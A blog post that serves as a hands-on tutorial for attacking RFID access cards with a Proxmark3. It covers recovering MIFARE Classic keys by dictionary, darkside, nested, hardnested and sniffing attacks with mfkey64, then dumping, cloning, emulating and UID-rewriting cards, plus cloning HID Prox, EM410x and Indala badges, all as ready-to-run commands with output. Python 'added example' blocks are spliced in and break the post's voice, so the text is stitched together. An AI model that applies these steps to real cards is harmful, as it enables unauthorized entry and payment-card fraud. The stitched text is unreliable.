Proxmark3 NFC Attack
ssooking

Environment setup

The Proxmark3 supports all kinds of low- and high-frequency cards and, with its companion software, can crack, sniff, emulate and clone them; it is known as the Swiss army knife of RFID.

Installing the Proxmark3 environment

https://github.com/Proxmark/proxmark3/wiki/Kali-Linux

Install the Proxmark3 on Kali Linux

# Kali
$ sudo apt-get install git build-essential libreadline5 libreadline-dev gcc-arm-none-eabi libusb-0.1-4 libusb-dev libqt4-dev ncurses-dev perl pkg-config libpcsclite-dev pcscd

# Ubuntu
$ sudo apt install p7zip git build-essential libreadline5 libreadline-dev libusb-0.1-4 libusb-dev libqt4-dev perl pkg-config wget libncurses5-dev gcc-arm-none-eabi libstdc++-arm-none-eabi-newlib libpcsclite-dev pcscd

# Build the Proxmark3 client and firmware
$ git clone https://github.com/Proxmark/proxmark3.git
$ cd proxmark3
$ make clean && make all

Checking that the Proxmark3 is working

Plug in the PM3 and check whether the system has detected the device:

$ lsusb
Bus 001 Device 002: ID 0e0f:000b VMware, Inc.
Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub
Bus 002 Device 005: ID 9ac4:4b8f J. Westhues ProxMark-3 RFID Instrument

$ sudo dmesg | grep -i usb | grep proxmark
......
[ 2836.850296] usb 4-2.4: Product: proxmark3
[ 2836.850297] usb 4-2.4: Manufacturer: proxmark.org
[ 2836.853857] cdc_acm 4-2.4:1.0: ttyACM0: USB ACM device

In its normal working state the PM3 should show only a white LED.

If orange-red and green LEDs light up when it is connected, or the device is not detected at all when plugged in (no response), the CDC bootloader probably needs to be reflashed.

Steps:

  1. Unplug the USB cable so the PM3 powers off.
  2. Hold down the button on the side of the PM3 and plug the USB cable back in; the device should now be detected.
  3. Keep holding the button and find the PM3 serial port under /dev; on Kali it should be /dev/ttyACM0.
  4. Reflash the CDC bootloader:
# Reflash the CDC bootloader
cd proxmark3/client
sudo ./flasher /dev/ttyACM0 -b ../bootrom/obj/bootrom.elf

After the CDC bootloader has been reflashed, the system should recognise the PM3 normally.

  5. Update the firmware

Keep holding the button and run the following commands:

cd proxmark3/client
sudo ./flasher /dev/ttyACM0 ../armsrc/obj/fullimage.elf

With the device in a normal state, run the following command to open the interactive command line of the proxmark3 client:

sudo ./proxmark3 /dev/ttyACM0

Check the basic status of the PM3 device:

# Check status
proxmark3> hw status (hw sta)

# Show firmware version
proxmark3> hw version(hw ver)

# Measure antenna voltage
proxmark3> hw tune
Measuring antenna characteristics, please wait........
# LF antenna: 22.27 V @ 125.00 kHz
# LF antenna: 31.76 V @ 134.00 kHz
# LF optimal: 31.76 V @ 133.33 kHz
# HF antenna: 20.17 V @ 13.56 MHz
Displaying LF tuning graph. Divisor 89 is 134khz, 95 is 125khz.

Recovering sector keys

https://www.cnblogs.com/k1two2/p/5706516.html

https://blog.csdn.net/qq_37806908/article/details/95992392

Factory default keys

M1 (MIFARE Classic) cards leave the factory with a uniform default key: both key A and key B are FFFFFFFFFFFF and the access control bits are FF087069, although some manufacturers use simple keys of their own as the factory default. For convenience, card issuers usually keep the manufacturer's default keys, or change the keys only on the sectors that hold important data. Scanning the sectors of an M1 card for default keys therefore makes key recovery much more efficient and also tells us whether the card is fully encrypted: if no default key is found on any sector, go straight to sniffing to obtain the keys.

Start the scan with the command hf mf chk *4 ? t, which tries 12 globally common default keys against sectors 0-39. If you already know which sector holds the data you care about and which key type it uses, narrow the command to shorten the scan. The scan takes about a minute; when it completes you can see that every sector except 10-15 uses the key FFFFFFFFFFFF, which tells us that sectors 10-15 hold the important data of this campus card, and these six sectors are the focus of the subsequent data analysis.

proxmark3> hf search
proxmark3> hf 14a info

# Check all sectors for default keys (A and B)
proxmark3> hf mf chk * ?

# Check key A of block 0 (sector 0)
proxmark3> hf mf chk 0 A

# Check key A of block 8 (the first block of sector 2)
proxmark3> hf mf chk 8 A

# Note: the number in the middle is a block number, not a sector number.
# Sector 0 is blocks 0-3, sector 1 is blocks 4-7, sector 2 is blocks 8-11.
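As an added example of the block/sector arithmetic behind that note (my own helpers, not code from the original post or from the Proxmark3 project), the following Python functions map block numbers to sectors and back for the 1K, 2K and 4K layouts. It goes beyond the 1K case in the note: on a 4K card the last eight sectors have 16 blocks each, which is where hand calculation usually goes wrong. The function names and the CARD_SECTORS table are mine; the layouts are the standard MIFARE Classic ones.

```python
# Added example: MIFARE Classic block <-> sector arithmetic (not code from the original post).
# Layout assumed: sectors 0-31 have 4 blocks of 16 bytes; sectors 32-39 (4K cards only)
# have 16 blocks. The last block of every sector is the trailer holding key A,
# the access bits and key B; block 0 is the read-only manufacturer block (UID).

CARD_SECTORS = {1: 16, 2: 32, 4: 40}   # card size in K -> number of sectors


def sector_of_block(block: int) -> int:
    """Return the sector containing `block` (valid for 1K, 2K and 4K cards)."""
    if not 0 <= block < 256:
        raise ValueError(f"block {block} out of range 0-255")
    if block < 128:
        return block // 4
    return 32 + (block - 128) // 16


def blocks_of_sector(sector: int) -> range:
    """Return the range of block numbers that belong to `sector`."""
    if not 0 <= sector < 40:
        raise ValueError(f"sector {sector} out of range 0-39")
    if sector < 32:
        return range(sector * 4, sector * 4 + 4)
    start = 128 + (sector - 32) * 16
    return range(start, start + 16)


def trailer_block(sector: int) -> int:
    """Block number of the sector trailer (keys + access bits) for `sector`."""
    return blocks_of_sector(sector)[-1]


def is_trailer(block: int) -> bool:
    """True if `block` is a sector trailer (the block a key check actually targets)."""
    return block == trailer_block(sector_of_block(block))


def layout(size_k: int):
    """List (sector, first_block, trailer_block) for a 1K, 2K or 4K card."""
    if size_k not in CARD_SECTORS:
        raise ValueError("card size must be 1, 2 or 4 (K)")
    return [(s, blocks_of_sector(s).start, trailer_block(s))
            for s in range(CARD_SECTORS[size_k])]


if __name__ == "__main__":
    # The note above: `hf mf chk 8 A` targets block 8, i.e. the first block of sector 2.
    print("block 8 -> sector", sector_of_block(8), "blocks", list(blocks_of_sector(2)))
    for sector, first, trailer in layout(4):
        print(f"sector {sector:2d}: blocks {first:3d}-{trailer:3d}, trailer {trailer}")
```

Run it as a script to print the full 4K table; the `is_trailer` check is the one to keep at hand when reading `hf mf chk` output, since a key is only meaningful for the sector whose trailer stores it.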

Dictionary attack on keys

# Dictionary attack on the A and B keys of all sectors
proxmark3> hf mf chk * ? /home/ssooking/key.txt

# Dictionary attack on the A keys of all sectors
proxmark3> hf mf chk * A /home/ssooking/test.txt

# Dictionary attack on key A of block 0 (sector 0)
proxmark3> hf mf chk 0 A /home/ssooking/key.txt

# Dictionary attack on key B of sector 2 (its first block is block 8)
proxmark3> hf mf chk 8 B /home/ssooking/key.txt

Dark-Side Attack

(only works against a weak PRNG)

proxmark3> hf mf mifare

Nested Authentication Exploit

(only works against a weak PRNG)

# With one key already known, run a NESTED attack to enumerate and recover the other keys.
# Syntax: hf mf nested <card memory: 1 = 1K> <block> <key A/B> <known key> [t|d]
proxmark3> hf mf nested 1 [block] [key_A/B] [known_key_val]
proxmark3> hf mf nested 1 0 A ffffffffffff

Tools such as mfoc or mfcuk can also be used to recover the key of a particular sector.

Verifying a key

# Test whether the key we obtained is correct; a wrong key does not return Found valid key:[xxxxx]
proxmark3> hf mf chk 0 A ffffffffffff
proxmark3> hf mf chk 0 ? ffffffffffff

Reading data from a protected sector

All of a sudden we have a new key: 080808080808. This key allows us to read our secret blocks:

proxmark3> hf mf rdbl 5 A 080808080808

# Write block contents
hf mf wrbl 5 A 080808080808 32110000cdeeffff3211000005fa05fa

Cloning a card

  1. Recover the card keys with the methods above.

  2. Export the keys of the protected sectors (obtain the keys of all sectors):

proxmark3> hf mf nested 1 0 A xxxxxxxxx d

proxmark3> hf mf nested 1 0 A ffffffffffff d

# The d option writes the recovered keys to the file dumpkeys.bin

  3. Export the card data:

# Parameter: 1 = 1K (default), 2 = 2K, 4 = 4K
proxmark3> hf mf dump 1

  4. Write the data to a blank card:

proxmark3> hf mf restore 1

Alternatively, first convert the exported data file: turn the binary file dumpdata.bin into a text file in eml format. PM3 ships with the dumptoemul.lua script for this, which produces an .eml file; a Python or Perl script can do the same conversion.

proxmark3> hf mf dump                # writes dumpdata.bin
proxmark3> script run dumptoemul.lua
...
Wrote an emulator-dump to the file 54CDBDD1.eml

# Or name the input file explicitly:
# script run dumptoemul -i dumpdata.bin
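The paragraph above says a Python or Perl script can do the same conversion as dumptoemul.lua; here is an added Python version (my own code, not the post's and not Proxmark's script). It assumes the usual layouts: dumpdata.bin is 64 blocks of 16 bytes for a 1K card (2K/4K are accepted as well), and an .eml file holds one block per line as 32 hex digits. The sample image is constructed inline; its block 0 uses the UID, ATQA and SAK values that appear in this post's `hf mf csetuid 798BBB39 0004 08` line, and the helper also decodes that manufacturer block so you can check the BCC before loading an image into a blank card.

```python
# Added example (not the post's or Proxmark's code): convert a MIFARE Classic dump between
# the raw binary form written by `hf mf dump` (dumpdata.bin: blocks of 16 bytes) and the
# .eml text form loaded by `hf mf eload` (one block per line as 32 hex digits).
# The sample dump is constructed here; UID/ATQA/SAK come from this post's csetuid line.

BLOCK = 16
VALID_SIZES = {1024: "1K", 2048: "2K", 4096: "4K"}


def bin_to_eml(data: bytes) -> str:
    """dumpdata.bin -> eml text (one 16-byte block per line, upper-case hex)."""
    if len(data) not in VALID_SIZES:
        raise ValueError(f"unexpected dump size {len(data)} bytes")
    return "".join(data[i:i + BLOCK].hex().upper() + "\n"
                   for i in range(0, len(data), BLOCK))


def eml_to_bin(text: str) -> bytes:
    """eml text -> raw bytes; rejects lines that are not exactly one block."""
    out = bytearray()
    for lineno, line in enumerate(text.splitlines(), 1):
        line = line.strip()
        if not line:
            continue
        if len(line) != 2 * BLOCK:
            raise ValueError(f"line {lineno}: expected {2 * BLOCK} hex digits, got {len(line)}")
        out += bytes.fromhex(line)
    if len(out) not in VALID_SIZES:
        raise ValueError(f"eml holds {len(out)} bytes, not a 1K/2K/4K image")
    return bytes(out)


def eml_is_valid(text: str) -> bool:
    """True if `text` parses as a complete 1K/2K/4K eml image."""
    try:
        eml_to_bin(text)
        return True
    except ValueError:
        return False


def parse_manufacturer_block(block0: bytes) -> dict:
    """Split block 0 of a 4-byte-UID card: UID(4) BCC(1) SAK(1) ATQA(2) vendor(8).
    ATQA is stored low byte first (0004 -> 04 00); BCC is the XOR of the UID bytes."""
    uid = block0[0:4]
    return {
        "uid": uid.hex(),
        "bcc_ok": block0[4] == (uid[0] ^ uid[1] ^ uid[2] ^ uid[3]),
        "sak": block0[5],
        "atqa": block0[6] | (block0[7] << 8),
    }


def build_sample_dump() -> bytes:
    """Constructed 1K image: manufacturer block for UID 798BBB39 (SAK 08, ATQA 0004),
    zeroed data blocks, and factory trailers (key A FF..FF, access bits FF078069, key B FF..FF)."""
    uid = bytes.fromhex("798BBB39")
    bcc = uid[0] ^ uid[1] ^ uid[2] ^ uid[3]
    block0 = uid + bytes([bcc, 0x08, 0x04, 0x00]) + bytes(8)
    trailer = bytes.fromhex("FFFFFFFFFFFF" "FF078069" "FFFFFFFFFFFF")
    blocks = [block0, bytes(BLOCK), bytes(BLOCK), trailer]          # sector 0
    blocks += ([bytes(BLOCK)] * 3 + [trailer]) * 15                  # sectors 1-15
    return b"".join(blocks)


if __name__ == "__main__":
    image = build_sample_dump()
    eml = bin_to_eml(image)
    print(eml.splitlines()[0], "...", len(eml.splitlines()), "blocks")
    print(parse_manufacturer_block(image[:BLOCK]))
    assert eml_to_bin(eml) == image
```

To convert a real dump, read dumpdata.bin with `open(path, "rb").read()`, pass it to `bin_to_eml`, and write the result to `<name>.eml`; `eml_to_bin` is the reverse path for hand-edited images, and it refuses a truncated or mis-sized file rather than producing a partial image that `hf mf eload` would silently accept.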

Write the data to a blank card:

proxmark3> hf mf eclr              # clear every block of the emulator memory
proxmark3> hf mf eload 54CDBDD1    # load the Mifare tag dump into emulator memory
proxmark3> hf mf cload 54CDBDD1    # write the card dump to the blank card

Changing the card UID

Cracking Mifare Classic 1K Cards

proxmark3> hf 14a info
proxmark3> hf mf csetuid 798BBB39 0004 08

Cloning a HID card

proxmark3> lf search
...
HID Prox TAG ID: 2004263f88 (8132) - Format Len: 26bit - FC: 19 - Card: 8132
Valid HID Prox ID Found!

# EM410X
lf em 410xread

Sniffing the communication

If the card does not suffer from the weak-RNG problem, the only feasible way to recover a key is to capture and analyse the authentication handshake.

  1. Identify the Classic 1K card on the reader:

hf 14a reader

  2. The Proxmark3 has a sniffing mode that records and dumps all RFID traffic; put the PM3 into sniffing mode:

hf 14a snoop

  3. Start sniffing the data:

hf mf sniff

     The Proxmark3 must be very close to both devices during the transaction; once the card has been presented, press the button on the Proxmark3 to stop sniffing.

  4. Print the data captured in sniffing mode to the terminal:

proxmark3> hf list 14a

Example:
proxmark3> hf 14a snoop
#db# cancelled by button
#db# COMMAND FINISHED
#db# maxDataLen=4, Uart.state=0, Uart.len=0
#db# traceLen=3179, Uart.output[0]=000000cb

proxmark3> hf list 14a
Recorded Activity (TraceLen = 3179 bytes)

Start = Start of Start Bit, End = End of last modulation. Src = Source of Transfer
iso14443a - All times are in carrier periods (1/13.56Mhz)
iClass - Timings are not as accurate
xxxx

An exclamation mark in the captured data marks a bit that was read incorrectly; it may take several attempts to capture a complete handshake with no errors. From a clean handshake you can obtain the UID, NT, NR, AR and AT values needed to extract the key.

  5. Once a suitable handshake has been captured, extract the key from it:

./tools/mfkey/mfkey64 [CARD_UID] [NT] [NR] [AR] [AT]
./tools/mfkey/mfkey64 9c599b32 82a4166c a1e458ce 6eea41e0 5cadf439 e709c8a
  6. With one valid key extracted, use the HardNested attack to recover the remaining keys:

hf mf hardnested [known_key_block] [known_key_type] [known_key] [target_block] [target_key_type]

hf mf hardnested 0 A key 0 B

# <block number> <key A|B> <key (12 hex symbols)>
# <target block number> <target key A|B> [known target key (12 hex symbols)] [w] [s]
# w: acquire nonces and write them to the binary file nonces.bin

hf mf hardnested 0 A 8829da9daf76 4 A w

Modifying card data


Once you have all the keys that you need:

Read the data from a particular block: hf mf rdbl [block] [A/B] [key]

Read all the data for a particular sector: hf mf rdsc [sector] [A/B] [key]

Write a specific block with your own data: hf mf wrbl [block_num] [key_type] [key] [block data]

Emulating cards

Replaying RFID signals

https://www.offensive-security.com/offsec/cloning-rfid-tags-with-proxmark-3/

https://scund00r.com/all/rfid/2018/06/05/proxmark-cheatsheet.html

### EM410X TAGS
Proxmark> lf read
Proxmark> lf em4x em410xread
EM410x Tag ID: 23004d4dee
Proxmark> lf em4x em410xsim 23004d4dee   # once the Proxmark has read the tag, it can try to replay it

# Emulate a Mifare access card with the PM3:
proxmark3> hf mf sim
uid:N/A, numreads:0, flags:0 (0x00)
#db# 4B UID: 2CF0550B

Proxmark> hf mf eload 54CDBDD1
Proxmark> hf mf sim u 54CDBDD1

# Indala
lf indala read
lf indala demod
lf indala sim a0000000c2c436c1
lf indala clone a0000000c2c436c1

Other

Changing the card UID

Cracking Mifare Classic 1K Cards https://www.youtube.com/watch?v=GqHaZicizvg

proxmark3> hf search
proxmark3> hf search
proxmark3> hf mf csetuid 798BBB39 0004 08

proxmark3> hf mf csetuid ba2ea6ab

HID card hacking

proxmark3> lf search
HID Prox TAG ID: 2004263f88 (8132) ...

proxmark3> lf hid fskdemod

proxmark3> lf hid clone 2004263f88
Cloning tag with ID 2004263f88
#db# DONE!
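The two HID sections above (cloning a HID card, and this one) both start from the `lf search` line `HID Prox TAG ID: 2004263f88 (8132) - Format Len: 26bit - FC: 19 - Card: 8132`. As an added example of what that line encodes, here is a Python decoder (my own code, not from the post or the Proxmark3 project) for the 26-bit H10301 Wiegand layout: an even-parity bit, an 8-bit facility code, a 16-bit card number and an odd-parity bit. The preamble handling (bit 37 marks a standard-length format, and the highest set bit below it gives the format length) is my reading of how the client arrives at "Format Len: 26bit"; it is checked against the post's own output line, which is the only input the example uses.

```python
# Added example (not the post's or Proxmark's code): decode the raw HID Prox ID printed
# by `lf search` into its 26-bit H10301 fields (facility code, card number, parity).
# Assumptions: bit 37 of the raw value flags a standard (<37-bit) format and the highest
# set bit below it is the format-length marker; the 26 payload bits sit beneath that marker.
import re

# Output line taken from this post (constructed input for the example).
SAMPLE_LINE = "HID Prox TAG ID: 2004263f88 (8132) - Format Len: 26bit - FC: 19 - Card: 8132"
LINE_RE = re.compile(r"HID Prox TAG ID:\s*([0-9a-fA-F]+)")


def raw_from_search_line(line: str) -> int:
    """Pull the raw hex tag value out of an `lf search` line."""
    m = LINE_RE.search(line)
    if not m:
        raise ValueError("no HID Prox TAG ID in line")
    return int(m.group(1), 16)


def split_hid_raw(raw: int):
    """Return (format_len, payload_bits) from the raw tag value."""
    if not (raw >> 37) & 1:
        raise ValueError("not a standard (<37-bit) HID format")
    body = raw & ((1 << 37) - 1)
    fmt_len = body.bit_length() - 1          # position of the length-marker bit
    return fmt_len, body & ((1 << fmt_len) - 1)


def parity(value: int) -> int:
    """1 if `value` has an odd number of set bits, else 0."""
    return bin(value).count("1") & 1


def decode_h10301(bits: int) -> dict:
    """26-bit layout, MSB first: [E][FC:8][CN:16][O].
    E = even parity over the first 13 bits, O = odd parity over the last 13 bits."""
    left13 = (bits >> 13) & 0x1FFF
    right13 = bits & 0x1FFF
    return {
        "fc": (bits >> 17) & 0xFF,
        "card": (bits >> 1) & 0xFFFF,
        "parity_ok": parity(left13) == 0 and parity(right13) == 1,
    }


def decode_search_line(line: str) -> dict:
    """Full pipeline: search line -> raw value -> format length -> H10301 fields."""
    fmt_len, bits = split_hid_raw(raw_from_search_line(line))
    if fmt_len != 26:
        raise ValueError(f"only the 26-bit format is handled here, got {fmt_len}")
    return {"format_len": fmt_len, **decode_h10301(bits)}


if __name__ == "__main__":
    print(decode_search_line(SAMPLE_LINE))
    # expected: {'format_len': 26, 'fc': 19, 'card': 8132, 'parity_ok': True}
```

The decoder makes the weakness of this credential explicit: the card transmits nothing but a static 8-bit facility code and 16-bit card number with two parity bits, so the reader cannot tell an original from any copy that presents the same value. For an access-control owner this means card numbers in reader logs are not proof of who presented the badge, and the remedy is a credential that authenticates itself to the reader rather than one that only announces an ID.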

hex2dumpkeys.pl

use strict;
use warnings;

# Key table as printed by `hf mf chk` (sector | key A | found | key B | found).
# Paste the real table here; the rows below are placeholders.
my $v = <<'EOF';
|000| a0a0a0a0a0a0 | 1 | b0b0b0b0b0b0 | 1 |
|001| a0a0a0a0a0a0 | 1 | b0b0b0b0b0b0 | 1 |
...
|015| a0a0a0a0a0a0 | 1 | b0b0b0b0b0b0 | 1 |
EOF

# Collect every 12-hex-digit key in the order it appears: A0, B0, A1, B1, ...
my @a;
while ($v =~ /.*?([0-9a-f]{12})/is) { push @a, $1; $v = $'; }

# dumpkeys.bin layout: all key A values (6 bytes each, in sector order), then all key B values.
open(my $fh, '>', 'dumpkeys.bin') or die "cannot open dumpkeys.bin: $!";
binmode $fh;
foreach my $odd (0, 1) {                     # 0 = key A column, 1 = key B column
    for (my $i = $odd; $i <= $#a; $i += 2) {
        print $fh pack('H*', $a[$i]);        # 12 hex digits -> 6 raw bytes
    }
}
close $fh;
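The Perl script above and the default-key scan described earlier ("every sector except 10-15 uses FFFFFFFFFFFF") both work from the same `hf mf chk` key table. As an added example serving both passages (my own Python, not the post's script or Proxmark's code), the block below parses that table, reports which sectors still rely on well-known default keys, and packs the keys into the same dumpkeys.bin layout the Perl script produces (16 key A values, then 16 key B values, 6 bytes each) and reads it back. The table is constructed inline to mirror the post's result, with sectors 10-15 re-keyed; the DEFAULT_KEYS set holds FFFFFFFFFFFF from this post plus a few NXP-documented defaults and is meant to be extended.

```python
# Added example (not the post's or Proxmark's code): parse the `hf mf chk` key table,
# flag sectors still using well-known default keys, and convert to/from dumpkeys.bin
# (all key A values in sector order, then all key B values, 6 bytes each).
import re

# Well-known factory defaults: FFFFFFFFFFFF from this post; the others are NXP's
# documented defaults (A0A1A2A3A4A5 is the MIFARE Application Directory key). Extend as needed.
DEFAULT_KEYS = {"ffffffffffff", "000000000000", "a0a1a2a3a4a5", "b0b1b2b3b4b5"}

ROW = re.compile(
    r"^\|\s*(\d{3})\s*\|\s*([0-9a-fA-F]{12}|-{12})\s*\|\s*(\d)\s*\|"
    r"\s*([0-9a-fA-F]{12}|-{12})\s*\|\s*(\d)\s*\|")

# Constructed table in the client's format: sectors 0-9 on factory keys,
# sectors 10-15 with a custom key A and key B not found.
SAMPLE_TABLE = "\n".join(
    ["|---|----------------|---|----------------|---|",
     "|sec|key A           |res|key B           |res|",
     "|---|----------------|---|----------------|---|"]
    + [f"|{s:03d}|  ffffffffffff  | 1 |  ffffffffffff  | 1 |" for s in range(10)]
    + [f"|{s:03d}|  1122334455{s:02x}  | 1 |  ------------  | 0 |" for s in range(10, 16)]
    + ["|---|----------------|---|----------------|---|"])


def parse_key_table(text: str) -> dict:
    """Return {sector: {"A": key or None, "B": key or None}}; None = key not found."""
    keys = {}
    for line in text.splitlines():
        m = ROW.match(line.strip())
        if not m:
            continue                      # header and separator lines
        sector, ka, fa, kb, fb = m.groups()
        keys[int(sector)] = {
            "A": ka.lower() if fa == "1" else None,
            "B": kb.lower() if fb == "1" else None,
        }
    return keys


def audit(keys: dict) -> dict:
    """Per sector: 'default' if any found key is a well-known default (the finding
    an issuer should act on), 'incomplete' if a key was not found, else 'custom'."""
    verdict = {}
    for sector, kv in sorted(keys.items()):
        found = [k for k in kv.values() if k is not None]
        if any(k in DEFAULT_KEYS for k in found):
            verdict[sector] = "default"
        elif len(found) < 2:
            verdict[sector] = "incomplete"
        else:
            verdict[sector] = "custom"
    return verdict


def to_dumpkeys_bin(keys: dict, sectors: int = 16, fill: str = "ffffffffffff") -> bytes:
    """Pack keys in dumpkeys.bin order: all key A, then all key B.
    Unknown keys are written as `fill` so every offset stays correct."""
    out = bytearray()
    for key_type in ("A", "B"):
        for s in range(sectors):
            out += bytes.fromhex(keys.get(s, {}).get(key_type) or fill)
    return bytes(out)


def from_dumpkeys_bin(data: bytes) -> dict:
    """Inverse of to_dumpkeys_bin: first half holds key A values, second half key B."""
    if len(data) % 12:
        raise ValueError("dumpkeys.bin length must be a multiple of 12")
    sectors = len(data) // 12
    return {s: {"A": data[s * 6:(s + 1) * 6].hex(),
                "B": data[(sectors + s) * 6:(sectors + s + 1) * 6].hex()}
            for s in range(sectors)}


if __name__ == "__main__":
    keys = parse_key_table(SAMPLE_TABLE)
    for sector, verdict in audit(keys).items():
        print(f"sector {sector:2d}: {verdict}")
    blob = to_dumpkeys_bin(keys)
    print(len(blob), "bytes; sector 10 key A =", from_dumpkeys_bin(blob)[10]["A"])
```

Feed it the real table (copied from the client, or the text the Perl script embeds) and write `to_dumpkeys_bin(...)` to dumpkeys.bin with a binary file handle. The audit is the defender's view of the same scan: any sector reported as "default" is readable by anyone with a reader, whatever the other sectors do.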

Common card fingerprints

# MIFARE Classic card
TYPE : NXP MIFARE CLASSIC 1k | Plus 2k SL1
Valid ISO14443A Tag Found - Quiting Search

# HID ProxCard
HID Prox TAG ID: 2004263f88 (8132) - Format Len: 26bit - FC: 19 - Card: 8132
Valid HID Prox ID Found!

# EM410x
Valid EM410x ID Found!

With the tag ID in hand, we need a blank RFID card to clone it onto. The best choice is the T5577, which can emulate a wide range of low-frequency cards, including the two discussed here (HID ProxCard and EM4100).

Reading and cloning RFID remotely

steal RFID tags from multiple feet away

References

  • Post title:Proxmark3 NFC Attack
  • Post author:ssooking
  • Create time:2020-01-25 13:19:00
  • Post link:https://ssooking.github.io/2020/01/proxmark3-nfc-attack/
  • Copyright Notice:All articles in this blog are licensed under BY-NC-SA unless stating additionally.